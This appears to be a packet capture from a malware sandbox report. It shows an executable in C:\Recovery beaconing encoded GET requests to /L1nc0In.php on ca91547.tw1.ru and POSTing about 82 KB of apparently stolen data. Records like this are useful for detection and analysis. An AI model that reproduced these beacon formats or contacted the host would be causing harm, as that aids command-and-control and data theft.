Dec 15, 2024 00:25:57.779922009 CET	50039	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:26:02.736378908 CET	50039	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:26:02.737349987 CET	50040	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:26:02.859203100 CET	80	50039	92.53.106.114	192.168.2.4
Dec 15, 2024 00:26:02.859618902 CET	80	50040	92.53.106.114	192.168.2.4
Dec 15, 2024 00:26:02.859688997 CET	50039	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:26:02.859795094 CET	50040	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:26:02.860007048 CET	50040	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:26:02.982345104 CET	80	50040	92.53.106.114	192.168.2.4
Dec 15, 2024 00:26:02.984569073 CET	80	50040	92.53.106.114	192.168.2.4
Dec 15, 2024 00:26:04.199723959 CET	80	50040	92.53.106.114	192.168.2.4
Dec 15, 2024 00:26:04.264442921 CET	50040	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:26:13.249866009 CET	50041	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:26:13.369967937 CET	80	50041	92.53.106.114	192.168.2.4
Dec 15, 2024 00:26:13.370188951 CET	50041	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:26:13.370189905 CET	50041	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:26:13.491775036 CET	80	50041	92.53.106.114	192.168.2.4
Dec 15, 2024 00:26:13.491938114 CET	80	50041	92.53.106.114	192.168.2.4
Dec 15, 2024 00:26:14.708265066 CET	80	50041	92.53.106.114	192.168.2.4
Dec 15, 2024 00:26:14.764440060 CET	50041	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:26:19.718617916 CET	50041	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:26:19.839776039 CET	80	50041	92.53.106.114	192.168.2.4
Dec 15, 2024 00:26:19.839926004 CET	80	50041	92.53.106.114	192.168.2.4
Dec 15, 2024 00:26:20.329792023 CET	80	50041	92.53.106.114	192.168.2.4
Dec 15, 2024 00:26:20.373893976 CET	50041	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:26:25.343332052 CET	50041	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:26:25.463773012 CET	80	50041	92.53.106.114	192.168.2.4
Dec 15, 2024 00:26:25.463824987 CET	80	50041	92.53.106.114	192.168.2.4
Dec 15, 2024 00:26:25.788796902 CET	80	50041	92.53.106.114	192.168.2.4
Dec 15, 2024 00:26:25.842472076 CET	50041	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:26:30.796363115 CET	50041	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:26:30.916379929 CET	80	50041	92.53.106.114	192.168.2.4
Dec 15, 2024 00:26:30.916529894 CET	80	50041	92.53.106.114	192.168.2.4
Dec 15, 2024 00:26:31.408529043 CET	80	50041	92.53.106.114	192.168.2.4
Dec 15, 2024 00:26:31.467642069 CET	50041	80	192.168.2.4	92.53.106.114

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 15, 2024 00:22:02.196444988 CET	61875	53	192.168.2.4	1.1.1.1
Dec 15, 2024 00:22:02.336528063 CET	53	61875	1.1.1.1	192.168.2.4
Dec 15, 2024 00:22:24.765283108 CET	55681	53	192.168.2.4	1.1.1.1
Dec 15, 2024 00:22:25.398117065 CET	53	55681	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 15, 2024 00:22:02.196444988 CET	192.168.2.4	1.1.1.1	0xd35b	Standard query (0)	raw.githubusercontent.com	A (IP address)	IN (0x0001)	false
Dec 15, 2024 00:22:24.765283108 CET	192.168.2.4	1.1.1.1	0x3aa8	Standard query (0)	ca91547.tw1.ru	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Dec 15, 2024 00:22:02.336528063 CET	1.1.1.1	192.168.2.4	0xd35b	No error (0)	raw.githubusercontent.com	185.199.109.133	A (IP address)	IN (0x0001)	false
Dec 15, 2024 00:22:02.336528063 CET	1.1.1.1	192.168.2.4	0xd35b	No error (0)	raw.githubusercontent.com	185.199.110.133	A (IP address)	IN (0x0001)	false
Dec 15, 2024 00:22:02.336528063 CET	1.1.1.1	192.168.2.4	0xd35b	No error (0)	raw.githubusercontent.com	185.199.108.133	A (IP address)	IN (0x0001)	false
Dec 15, 2024 00:22:02.336528063 CET	1.1.1.1	192.168.2.4	0xd35b	No error (0)	raw.githubusercontent.com	185.199.111.133	A (IP address)	IN (0x0001)	false
Dec 15, 2024 00:22:25.398117065 CET	1.1.1.1	192.168.2.4	0x3aa8	No error (0)	ca91547.tw1.ru	92.53.106.114	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

raw.githubusercontent.com

ca91547.tw1.ru

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49735	92.53.106.114	80	2872	C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 00:22:25.526041985 CET	485	OUT	GET /L1nc0In.php?kladSzP6lHuJ4aKJis7YXjQcYTaP=5JsuJU&42967b720727e4e345f9f350ee86f808=b2c0a37eb61845d3c0e712bac039aad1&438f148c0e5f9286e56e53eb6890b7d4=QOxEmYzIDMjNGOxEWY5cDZyYzY1kTMkNjM5EjY0MTOiRjNjNzNlVTN&kladSzP6lHuJ4aKJis7YXjQcYTaP=5JsuJU HTTP/1.1 Accept: / Content-Type: text/plain User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: ca91547.tw1.ru Connection: Keep-Alive
Dec 15, 2024 00:22:27.113152981 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.26.1 Date: Sat, 14 Dec 2024 23:22:26 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 2160 Connection: keep-alive Vary: Accept-Encoding Data Raw: 3d 3d 51 66 69 51 54 4f 78 67 54 4d 34 67 7a 4d 30 45 47 4d 6d 46 57 4f 35 63 54 4d 34 49 6a 4d 6b 42 44 4d 31 51 54 4e 68 56 47 5a 6b 56 6a 59 69 6f 6a 49 31 4d 54 5a 6c 5a 44 5a 6d 46 54 4d 68 42 7a 4e 7a 4d 57 5a 69 52 6d 4d 77 51 6d 4d 33 41 6a 4d 35 67 44 5a 30 45 57 4e 7a 63 6a 49 73 49 69 5a 52 39 32 64 50 6c 6d 53 35 70 46 57 53 6c 6e 57 59 70 56 64 69 42 6a 54 31 6b 6c 4d 31 77 32 59 75 70 55 4d 5a 46 54 4f 31 46 32 56 6b 46 6a 59 49 4a 6b 64 61 64 31 59 70 6c 30 51 42 74 45 54 44 6c 30 61 4a 70 32 62 70 39 55 52 61 56 6c 56 57 6c 7a 63 69 4a 6a 53 30 56 6d 56 4f 56 54 57 79 55 44 62 6a 35 6d 53 78 6b 56 4d 35 55 58 59 58 52 57 4d 69 68 6b 51 32 70 31 56 6a 6c 57 53 44 46 30 53 4d 4e 55 53 72 6c 6b 61 76 6c 6d 59 48 6c 54 61 69 68 46 62 55 56 32 56 4f 56 6e 57 59 70 55 65 6b 64 6c 54 6d 4a 57 62 73 35 47 5a 58 68 33 64 69 4a 6a 56 75 6c 55 61 42 64 32 51 70 64 58 61 53 5a 6b 54 57 6c 6b 61 76 6c 6d 57 58 4a 6c 64 52 4e 44 62 71 4a 57 62 57 6c 33 59 75 5a 6c 61 59 4a 54 4e 77 70 31 4d 57 4e [TRUNCATED] Data Ascii: ==QfiQTOxgTM4gzM0EGMmFWO5cTM4IjMkBDM1QTNhVGZkVjYiojI1MTZlZDZmFTMhBzNzMWZiRmMwQmM3AjM5gDZ0EWNzcjIsIiZR92dPlmS5pFWSlnWYpVdiBjT1klM1w2YupUMZFTO1F2VkFjYIJkdad1Ypl0QBtETDl0aJp2bp9URaVlVWlzciJjS0VmVOVTWyUDbj5mSxkVM5UXYXRWMihkQ2p1VjlWSDF0SMNUSrlkavlmYHlTaihFbUV2VOVnWYpUekdlTmJWbs5GZXh3diJjVulUaBd2QpdXaSZkTWlkavlmWXJldRNDbqJWbWl3YuZlaYJTNwp1MWN3YHlDbalXSnlUQvNXStRXeiFDbmRmMW9ETxgHaZJDb5p1VxIUSq9WaadVN2VWbWRXYYJlZi1GbuR2V4dnYyYlbJlWQnNUa3lWTElUaPlmS6R2VstWWWpUNZJjR5R2VOpWUXVjdhhlUollM5MHWyUDcaNjVzN2R5wmW5l0ZJF0bzlkaRhXTEFUdOR0Y0lkavlmWXJVMkdEbuJWb5MHWyUDcaNjVzN2R5wmW5l0ZJF0bzlkaNdnTUNWdNRUUp9UaKxmWIZFMhhlUoJmR5UXYXRWMihkQ2p1VjlWSDF0SMNkSollMslnWXFjQJdEawMWb58USq9WaadVMoRlbSVnWXVDckdUN2lVM5UXYXRWMihkQ2p1VjlWSDF0SMNkSCRVaJZTStZ1aiBjTwIWbWVXYYJVdiJjTmJWbs5GZXh3diJjVulUaBd2QphHbjJDeoplavlmWYJFajxmUCZlbWxGWyUDcaNjVzN2R5wmW5l0ZJF0bz1ERvlmVVZVdhZVO1F2VkFjYIJkdad1Ypl0QBtETDpkeahlUoRmRNdmWHZFMhdVNWlkavlmWXFDaU5Gb5R2R1EjYy4kZi1GbuR2V4dnYyYlbJlWQnNUa3lWVxUVaPlmSsp1R5QUZYpEMi5mV2lVM5UXYXRWMihkQ2p1VjlWSDF0SMNUS41ERVl2T [TRUNCATED]
Dec 15, 2024 00:22:27.113286018 CET	1111	IN	Data Raw: 46 30 62 7a 6c 55 61 4a 5a 54 53 74 5a 31 61 69 42 6a 54 6f 70 46 57 4b 68 47 57 79 55 44 63 61 4e 6a 56 7a 4e 32 52 35 77 6d 57 35 6c 30 5a 4a 46 30 62 7a 6c 55 62 30 6c 6e 59 78 73 32 5a 6b 4a 6a 56 50 6c 6b 61 76 6c 6d 57 58 46 44 61 55 31 57 Data Ascii: F0bzlUaJZTStZ1aiBjTopFWKhGWyUDcaNjVzN2R5wmW5l0ZJF0bzlUb0lnYxs2ZkJjVPlkavlmWXFDaU1WN2F2Vkx2YslTdhdFZxIGSCZnWXNWaJNUQLx0QKpFVplkNJ1mVrJGMOVnYywmbahlSmJWbs5GZXh3diJjVulUaBd2QpdXahNjS2d1UCNjWVRTaPlmS1JmMs5mWYpkZi1GbuR2V4dnYyYlbJlWQnNUa3lWYzokdXNlQ
Dec 15, 2024 00:22:27.321342945 CET	749	OUT	GET /L1nc0In.php?C514=doeh8J79bHCLPWM&a3168bb3a0a66a80c97b1c5f65d27314=wMiNGMxIzMmdTZiljY0YDMwMGMklDZ2E2NkZzMkRTY3UjN1kjMiJWN3MTO5czM0ITOyQTM2cDO&438f148c0e5f9286e56e53eb6890b7d4=AN2EDZjNmZzUWYkN2N1IjY4EWMjVmM2MmNkBzM3UTY0gjYzMjNkJmN&71411a4c54be7086c59f1fd61c0b5f77=0VfiIiOiUGMmlDNlJTO2U2MiNzYykTNiRDZ5QWM1YmN3MGZyIDMiwiI5EmMiNTMjJTN5EmZjFDZjZDN5kTMyYmYkRjY2cDOiZjZ2YmNwM2NxIiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W HTTP/1.1 Accept: / Content-Type: text/plain User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: ca91547.tw1.ru
Dec 15, 2024 00:22:27.767513990 CET	161	IN	HTTP/1.1 200 OK Server: nginx/1.26.1 Date: Sat, 14 Dec 2024 23:22:27 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Dec 15, 2024 00:22:27.774488926 CET	1264	OUT	GET /L1nc0In.php?C514=doeh8J79bHCLPWM&a3168bb3a0a66a80c97b1c5f65d27314=wMiNGMxIzMmdTZiljY0YDMwMGMklDZ2E2NkZzMkRTY3UjN1kjMiJWN3MTO5czM0ITOyQTM2cDO&438f148c0e5f9286e56e53eb6890b7d4=AN2EDZjNmZzUWYkN2N1IjY4EWMjVmM2MmNkBzM3UTY0gjYzMjNkJmN&9cf44557760a31b9394c29aa9649d97b=QX9JSUml2auNGbaNjYqZVbVNGes9ERKl2Tpd2RkhmQsl0cJlmYzkTbiJXNXZVavpWSvJFWZFlUtNmdOJzYwJ1aJNXSplkNJNUYwY0RVRnRtNmbWdkYsJFbJNXSplkNJl3Y3JEWRRnRXpFMOxWSzlUaiNTOtJmc1clVp9maJVEbrNGbOhlV0Z0VaBjTsl0cJlmYzkTbiJXNXZVavpWS5ZlMjZVMXlFbSNTVpdXaJVHZzIWd01mYWpUaPl2YtJGa4VlYoZ1RkRlSDxUa0IDZ2VjMhVnVslkNJNUYwY0RVRnRXpFMOxWSzl0UZJTSXlFdBR0TyklaOBTQql1N1MlZ3FERNdXQE10dBpGT4RzQNVXQ6VWavpWS6ZVbiZHaHNmdKNTWwFzaJNXSplkNJl3Y0ZkMZlmVyYVa3lWS1hHbjNmRUdlQ4VUVUxWRSNGesx0Y4ZEWjpUaPlWTuJGbW12Yq5EbJNXS5tEN0MkTp9maJVXOXFmeKhlWXRXbjZHZYpFdG12YHpUelJiOiUGMmlDNlJTO2U2MiNzYykTNiRDZ5QWM1YmN3MGZyIDMiwiI5EmMiNTMjJTN5EmZjFDZjZDN5kTMyYmYkRjY2cDOiZjZ2YmNwM2NxIiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykz [TRUNCATED] Accept: / Content-Type: text/plain User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: ca91547.tw1.ru
Dec 15, 2024 00:22:28.389102936 CET	161	IN	HTTP/1.1 200 OK Server: nginx/1.26.1 Date: Sat, 14 Dec 2024 23:22:28 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Dec 15, 2024 00:22:28.801779032 CET	161	IN	HTTP/1.1 200 OK Server: nginx/1.26.1 Date: Sat, 14 Dec 2024 23:22:28 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49737	92.53.106.114	80	2872	C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 00:22:27.444334030 CET	2150	OUT	GET /L1nc0In.php?C514=doeh8J79bHCLPWM&a3168bb3a0a66a80c97b1c5f65d27314=wMiNGMxIzMmdTZiljY0YDMwMGMklDZ2E2NkZzMkRTY3UjN1kjMiJWN3MTO5czM0ITOyQTM2cDO&438f148c0e5f9286e56e53eb6890b7d4=AN2EDZjNmZzUWYkN2N1IjY4EWMjVmM2MmNkBzM3UTY0gjYzMjNkJmN&67f9507ea65bfaeab135f64196ff63f5=d1nIhhjYiZTOlRmNyMmYwITYkJWZ2YmZiFjZkhzY2kDO0cDZkJTMxgTMiJiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W&71411a4c54be7086c59f1fd61c0b5f77=QX9JiI6ISZwYWO0UmM5YTZzI2MjJTO1IGNklDZxUjZ2czYkJjMwICLiEGOiJmN5UGZ2IzYiBjMhRmYlZjZmJWMmRGOjZTO4QzNkRmMxEDOxImI6IiZzgDMyMmM2UGMllzN4QjNiJTYxQWYxM2MlRDO5IGOwICLiMGOkJjZjZWZmFTZzIDZhJWZzITZiFDNxkjZ5E2Y3gDZ0AjMlRzN4EjI6IiMhZGNyI2Y0gDOzQGZ0IWZ0ITO3IWYjJ2YhJzMiRGOxIyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplEbahVYw40VRl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3 [TRUNCATED] Accept: / Content-Type: text/plain User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: ca91547.tw1.ru
Dec 15, 2024 00:22:28.801826000 CET	267	IN	HTTP/1.1 200 OK Server: nginx/1.26.1 Date: Sat, 14 Dec 2024 23:22:28 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 4e 79 4d 6a 59 68 68 6a 5a 79 4d 6a 4d 32 51 6a 5a 78 41 44 4e 34 4d 6d 59 6d 46 6d 5a 6d 4e 7a 4e 79 59 57 4d 31 59 57 4f 69 4a 79 65 36 49 69 59 32 4d 7a 59 69 42 44 4f 6c 4a 54 4e 6c 56 44 4f 32 45 54 59 6b 4e 44 4f 79 51 32 59 32 4d 44 4f 32 4d 57 5a 68 4a 44 4f 6a 4a 79 65 Data Ascii: ==Qf9JiI6IiNyMjYhhjZyMjM2QjZxADN4MmYmFmZmNzNyYWM1YWOiJye6IiY2MzYiBDOlJTNlVDO2ETYkNDOyQ2Y2MDO2MWZhJDOjJye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49739	92.53.106.114	80	2872	C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 00:22:29.731091022 CET	752	OUT	GET /L1nc0In.php?C514=doeh8J79bHCLPWM&a3168bb3a0a66a80c97b1c5f65d27314=wMiNGMxIzMmdTZiljY0YDMwMGMklDZ2E2NkZzMkRTY3UjN1kjMiJWN3MTO5czM0ITOyQTM2cDO&438f148c0e5f9286e56e53eb6890b7d4=AN2EDZjNmZzUWYkN2N1IjY4EWMjVmM2MmNkBzM3UTY0gjYzMjNkJmN&71411a4c54be7086c59f1fd61c0b5f77=QX9JSUNJiOiUGMmlDNlJTO2U2MiNzYykTNiRDZ5QWM1YmN3MGZyIDMiwiIxQjNiRGO3QGM1UjM3YzN4MjN0UzMkN2M4gTOlFWYjNGZ5ITNyIWZ3IiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W HTTP/1.1 Accept: / Content-Type: text/plain User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: ca91547.tw1.ru
Dec 15, 2024 00:22:31.079457998 CET	161	IN	HTTP/1.1 200 OK Server: nginx/1.26.1 Date: Sat, 14 Dec 2024 23:22:30 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49740	92.53.106.114	80	2872	C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 00:22:31.208431959 CET	555	OUT	POST /L1nc0In.php?C514=doeh8J79bHCLPWM&a3168bb3a0a66a80c97b1c5f65d27314=wMiNGMxIzMmdTZiljY0YDMwMGMklDZ2E2NkZzMkRTY3UjN1kjMiJWN3MTO5czM0ITOyQTM2cDO&438f148c0e5f9286e56e53eb6890b7d4=AN2EDZjNmZzUWYkN2N1IjY4EWMjVmM2MmNkBzM3UTY0gjYzMjNkJmN HTTP/1.1 Content-Type: multipart/form-data; boundary=----------WebKitFormBoundaryNxmnOXYO8CVog1eT User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: ca91547.tw1.ru Content-Length: 81980 Expect: 100-continue Connection: Keep-Alive
Dec 15, 2024 00:22:31.590099096 CET	12360	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 57 65 62 4b 69 74 46 6f 72 6d 42 6f 75 6e 64 61 72 79 4e 78 6d 6e 4f 58 59 4f 38 43 56 6f 67 31 65 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 Data Ascii: ------------WebKitFormBoundaryNxmnOXYO8CVog1eTContent-Disposition: form-data; name="629f82b381474326c1d965865267842a"zgzMyQGMwIGN3MTM3QWZkNmY0U2MlJTZ2ITYyI2NjNDO5QWOyI2N20yY4QmMmNmZlZWMlNjMkFmYlNjMlJWM0ETOmlTYjdDOkRDMyUGN3gTM----------
Dec 15, 2024 00:22:31.710333109 CET	9888	OUT	Data Raw: 1c e1 67 24 cd f7 8c d8 ff 0d 7b b6 f3 16 a2 99 15 e8 d4 b5 db f9 29 2e 60 50 de fc 14 ec ca 50 f0 ee 05 2c 7a 36 01 43 7f 31 5c 05 96 4b 9d 63 42 87 bf 9a 14 f6 2c 2f 8d 73 99 11 e0 cd df c4 e3 36 14 da 90 51 87 fa c5 d2 ba 08 46 01 78 80 9e 72 Data Ascii: g${).`PP,z6C1\KcB,/s6QFxr][mYD`%bF;parDb!7:s/l$c=NrOq: f,\D@rW\U]Pht0k;H`bc1\|wp@0<2F
Dec 15, 2024 00:22:31.710402012 CET	4944	OUT	Data Raw: 54 34 11 b5 07 ac be 47 8d ca 3e 69 7c 36 8c 1a d0 79 6f 0a 83 86 bc b9 b3 1c e1 cc 29 18 6a d4 c3 2f e9 e3 a9 61 9b 48 0d ca e7 12 1a 94 d8 ae cb e3 a9 5b 26 c4 53 db e5 4d f7 07 28 c2 20 af 1b ca 01 e3 b5 d4 f5 c5 43 f1 c1 b0 88 0c cf de 06 31 Data Ascii: T4G>i\|6yo)j/aH[&SM( C1al+guEtTM\|K )NS!v^aRryD!^p%MmfP},*HpdUxsW\|B<F]:@N/9f@kL][I.F4- ZA-?OjQ^~
Dec 15, 2024 00:22:31.710665941 CET	9888	OUT	Data Raw: b7 c5 78 a8 94 9b e1 6f 07 00 7d 7e 36 cf 60 2c 75 0d ff f1 77 28 38 77 05 a1 4b d3 5a 00 3d 70 10 23 ab 7e 22 41 d0 e5 a0 82 c5 ca 4e 7b 3a 87 fe 3a e3 bf de 40 74 ea 6e 7c 30 10 2d c1 04 09 a1 75 bd b5 e0 a8 51 2a 44 7f 83 de de 0c 42 72 d3 54 Data Ascii: xo}~6`,uw(8wKZ=p#~"AN{::@tn\|0-uQDBrT"y54.FgP0rN&[NT<7-NSOtKd;KvZPc+n[dqH\|nu'>+HZ,+b%<9I"4S@8>)o\
Dec 15, 2024 00:22:31.830354929 CET	9888	OUT	Data Raw: 79 f3 2a 9c 4e 75 3a 2c 75 c6 98 61 aa 9e 7f a9 81 67 c0 b9 78 4e 9f a2 6f 4d 29 22 87 b4 c1 ca 5b ca 20 51 80 d6 09 e7 21 5f 7d d9 8c 4a 3d 03 32 32 78 e8 b3 27 e9 21 26 c5 6c 3b 46 96 7e 5a 9b e9 f3 67 5b b2 9f 43 dd 58 76 37 d0 c2 e8 1d 1b 87 Data Ascii: y*Nu:,uagxNoM)"[ Q!_}J=22x'!&l;F~Zg[CXv71pZ`)Ljf9Z=IN^}?YMW5_EDR}ogxF]CM>\| E<XH?1RknI-A?#~;:,zv
Dec 15, 2024 00:22:31.830791950 CET	2472	OUT	Data Raw: 2f 14 83 43 27 de ea d4 fb de bb 58 b3 72 46 d6 2a 49 9b 98 97 45 00 06 75 ed 5f 40 fa 10 f6 68 dd 17 f3 23 b1 10 c6 5e b5 f0 73 2d 10 90 ec 22 c6 e5 2b c6 a6 b1 08 0a e8 79 b9 b7 2d 9c 22 7d 51 cd d0 34 5a c9 2e 21 16 53 04 66 0f 2d bc ae 62 2a Data Ascii: /C'XrFIEu_@h#^s-"+y-"}Q4Z.!Sf-b=CM!+(+aIu8sCPGnH>lm1"^!~UipzWsjdJ\1[WWgII^G#/^~F$?>j(
Dec 15, 2024 00:22:31.871862888 CET	28428	OUT	Data Raw: df 75 aa 1f 66 62 2a a6 96 22 1f f7 d9 d3 be 4b 4c 92 3a 13 75 c6 72 20 79 ea 4d ba 6f ff db 0b 17 fa eb cd de 13 80 c8 20 02 60 3e 79 68 c8 3f d8 41 76 34 47 74 86 d8 22 e9 46 32 36 3f c6 3b f5 5a ca be a8 a7 19 c8 49 71 3a ba 92 e1 9e d5 88 af Data Ascii: ufb*"KL:ur yMo `>yh?Av4Gt"F26?;ZIq:.ZyRbzBa UR\T'<GrFTfjbvb8/ lE\|vACn[u gO~fxAY[}?TKqn&Y^la:A!K',d
Dec 15, 2024 00:22:31.991906881 CET	4112	OUT	Data Raw: 80 5a 38 cd 10 77 dd 2b 22 ec d8 99 2b c7 59 35 7a 2a 4b 40 50 e6 65 46 a3 bc 47 73 cb 21 b9 d4 2b 51 72 7c 77 62 73 33 48 e7 fb e8 d6 bb 83 c0 47 22 07 db aa e3 f5 46 12 36 93 0e 47 3a f1 31 a6 96 92 40 6b ee 51 cf 50 b9 3a e5 2e 73 ea 4e 4a 3f Data Ascii: Z8w+"+Y5z*K@PeFGs!+Qr\|wbs3HG"F6G:1@kQP:.sNJ?,5:/Q?,/iv{?IoN}AVXum^5I8=cEn!CgW_u%LrW5ofxLJ
Dec 15, 2024 00:22:32.540268898 CET	25	IN	HTTP/1.1 100 Continue
Dec 15, 2024 00:22:33.008599997 CET	161	IN	HTTP/1.1 200 OK Server: nginx/1.26.1 Date: Sat, 14 Dec 2024 23:22:32 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49741	92.53.106.114	80	2872	C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 00:22:33.932033062 CET	2152	OUT	GET /L1nc0In.php?C514=doeh8J79bHCLPWM&a3168bb3a0a66a80c97b1c5f65d27314=wMiNGMxIzMmdTZiljY0YDMwMGMklDZ2E2NkZzMkRTY3UjN1kjMiJWN3MTO5czM0ITOyQTM2cDO&438f148c0e5f9286e56e53eb6890b7d4=AN2EDZjNmZzUWYkN2N1IjY4EWMjVmM2MmNkBzM3UTY0gjYzMjNkJmN&67f9507ea65bfaeab135f64196ff63f5=d1nIhhjYiZTOlRmNyMmYwITYkJWZ2YmZiFjZkhzY2kDO0cDZkJTMxgTMiJiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W&71411a4c54be7086c59f1fd61c0b5f77=d1nIiojIlBjZ5QTZykjNlNjYzMmM5UjY0QWOkFTNmZzNjRmMyAjIsISY4ImY2kTZkZjMjJGMyEGZiVmNmZmYxYGZ4MmN5gDN3QGZyETM4EjYiojImNDOwIzYyYTZwUWO3gDN2ImMhFDZhFzYzUGN4kjY4AjIsIyY4QmMmNmZlZWMlNjMkFmYlNjMlJWM0ETOmlTYjdDOkRDMyUGN3gTMiojIyEmZ0IjYjRDO4MDZkRjYlRjM5cjYhNmYjFmMzIGZ4EjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEV [TRUNCATED] Accept: / Content-Type: text/plain User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: ca91547.tw1.ru
